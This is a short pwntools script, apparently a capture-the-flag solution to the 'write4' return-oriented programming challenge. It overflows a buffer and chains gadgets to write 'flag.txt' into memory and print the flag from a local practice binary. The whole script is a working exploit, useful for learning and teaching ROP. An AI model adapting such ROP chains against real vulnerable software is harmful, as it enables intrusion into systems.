from pwn import *

p = process("./write4")

gad1  = 0x0000000000400690 #: pop r14 ; pop r15 ; ret
gad2  = 0x0000000000400628 #: mov qword ptr [r14], r15 ; ret
gad3  = 0x0000000000400693 #: pop rdi ; ret
data  = 0x0000000000601028
Print = 0x0000000000400510


payload  = 'A'*40
payload += p64(0x00000000004004e6)
payload += p64(gad1)
payload += p64(data)
payload += b'flag.txt'
payload += p64(gad2)
payload += p64(gad3)
payload += p64(data)
payload += p64(Print)

p.recvuntil('>')
p.sendline(payload)

print(p.recvall())
